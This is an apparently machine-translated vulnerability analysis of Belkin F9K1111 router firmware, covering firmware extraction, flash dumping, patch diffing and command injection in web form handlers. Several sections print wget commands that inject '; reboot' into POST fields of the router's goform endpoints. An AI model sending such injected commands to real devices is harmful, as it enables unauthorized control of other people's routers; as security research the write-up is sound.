Belkin F9K1111 firmware Vulnerability Analysis

Belkin F9K1111 firmware Vulnerability Analysis

Recently, we have noticed that HP DVLabs has found at least 10 vulnerabilities in the Belkin (Belkin) N300 dual-band WiFi provisioner (F9K1111. In response, Belkin released the firmware version 1.04.10. Because this is the first release of the F9K1111 update and there is no public trigger method for this vulnerability, it is very interesting and meaningful to conduct in-depth research on it.

0 × 01 unpack and update the file

Before starting the analysis, we first download the firmware update from the vendor's website [1], and then use the firmware tool binwalk [2] to unpack the Update file.
$ Binwalk-Me F9K1111_WW_1.04.10_upg.bin

The following figure shows the result. It looks like a fairly standard SquashFS file system, representing the root directory of the device.


Now, in order to execute bindiff, We need to interact with the hardware to obtain the files in the patch status.
0 × 02 get basic firmware
To analyze the basic firmware, we need to use some methods to dump data in the physical device. To do this, you must first remove the device's shell.


The red and blue boxes may be the locations where the firmware, SPI flash chip, and UART interface are retrieved. Although we have seen some UART-level activities, we will continue to process the basic images on the SPI flash chip. The chip pin MX25L 1606e we are working on can be obtained from Macronix.


After obtaining the table and removing the chip, we are ready to connect GoodFET [3] to the above general 8-pin.


After pin 7 and 8 are bridging, we use the following code to ensure that all hooks are correctly executed:
$ Python goodfet. spiflash info

Next, run goodfet. spiflash dump to obtain the content in the chip.
$ Python goodfet. spiflash dump s


Finally, we perform a quick string search on the result file to ensure that dump looks legal (at least contains some readable strings ).


Similar to before, binary files can be unwrapped through binwalk.

0 × 03 perform Diffing on the updated file

Move the file system that has been unwrapped the previous two times to a Windows box and drag them into WinMerge [4]. It can be seen that there is not much change.


The files compiler_data, version, and FUNCTION_SCRIPT do not contain any interesting changes (except data that may be useful to some fingerprints), and there is not much interesting change in util_system.asp. Therefore, we spend most of our effort on viewing Belkin's modifications to webs GoAhead Webserver.

0 × 04 webs Analysis

HP's Zero Day Initiative has named these vulnerabilities using names or input of potentially affected functions, as follows:
1. formWpsStart pinCode Remote Code Vulnerability
2. formWlanSetupWPS wps_enrolee_pin Remote Code Execution Vulnerability
3. formWlanMP Remote Code Execution Vulnerability
4. formBSSetSitesurvey Remote Code Execution Vulnerability
5. formHwSet Remote Code Execution Vulnerability
6. formConnectionSetting Remote Code Execution Vulnerability
7. formAccept Remote Code Execution Vulnerability
8. formiNICWpsStart Remote Code Execution Vulnerability
9. formUSBStorage Remote Code Execution Vulnerability

Therefore, after the webs patch version is loaded to IDA, we search for formHwSet in the function list. However, nothing is found. In fact, many of these functions are not found. Drag it into Bindiff. We can see that Seven functions are removed from the update, as shown in the following table.

 

These well correspond to the data in the ZDI report. In fact, every function listed in the ZDI report has been deleted, except formWlanSetupWPS and formBSSetSitesurvey. Next, we will take some time to view the deleted functions in detail.

0 × 05 formUsbStorage

The formUsbStorage function is analyzed first. After reading this function quickly, it is obvious that there are some problems. First, use the GoAhead webs API function websGetVar to access the POST variable sub_dir, and then use this variable to call the system. Command Injection is allowed here.


This code can be triggered by the following command:
Wget -- post-data = "sub_dir = vectra; reboot" http://belkin.range/goform/formUSBStorage

0 × 06 formWlanMP

Similarly, similar errors can be found in formWIanMP. By tracing websGetVar calls, we can see some possible vulnerabilities.


Further, we will find that these possibilities can be used as the entry point for injection into system calls. Here we will analyze ateFunc.

This code can be triggered by the following command:
Wget -- post-data = "ateFunc =; reboot;" http://belkin.range/goform/formWlanMP

0 × 07 formHwSet

More Command Injection Vulnerabilities exist here. This time we use the variable [sic] Anntena.


This code can be triggered by the following command:
Wget -- post-data = "Anntena =; reboot;" http://belkin.range/goform/formHwSet

0 × 08 formConnectionSetting

Here, we found the command injection vulnerability in the timeOut parameter of the formConnectionSetting function.


This code can be triggered by the following command:

Wget -- post-data = "timeOut = 1; reboot;" http://belkin.range/goform/formConnectionSetting
0 × 09 formBSSetSitesurvey

Now, we have thoroughly analyzed the deleted functions. Next, let's take a look at the more important function, that is, the formBSSetSitesurvey function that Belkin has not deleted is its overall structure:


After the rollback, We amplified and found that the biggest change was that Belkin added a strcat_escape function and used strcat_escape throughout the function.


This strcat_escape function requires three buffers: dst, src, and tokens. If tokens is escaped before being copied to dst, this function searches for any escaped tokens in the src string using nested loops. As shown in the figure, token_of_none_quotation is passed as a token, which is defined as "\" '$ ()' # & * | ;". With the webs binary file, we can re-implement this function in C language, and then we can see the expected output:

Then, pass the (probably correct) Escape string to the system through sprintf.


The effectiveness of this patch depends on several factors:

1. The strcat_escape function works exactly as expected

2. strcat_escape will not inadvertently cause Buffer Overflow

3. strcat_escape, used for all user input, ended in system

0x0A conclusion

We have all realized that the security maturity of embedded device code is still a problem. In this article, we can see that even devices released in 2014 are still a problem.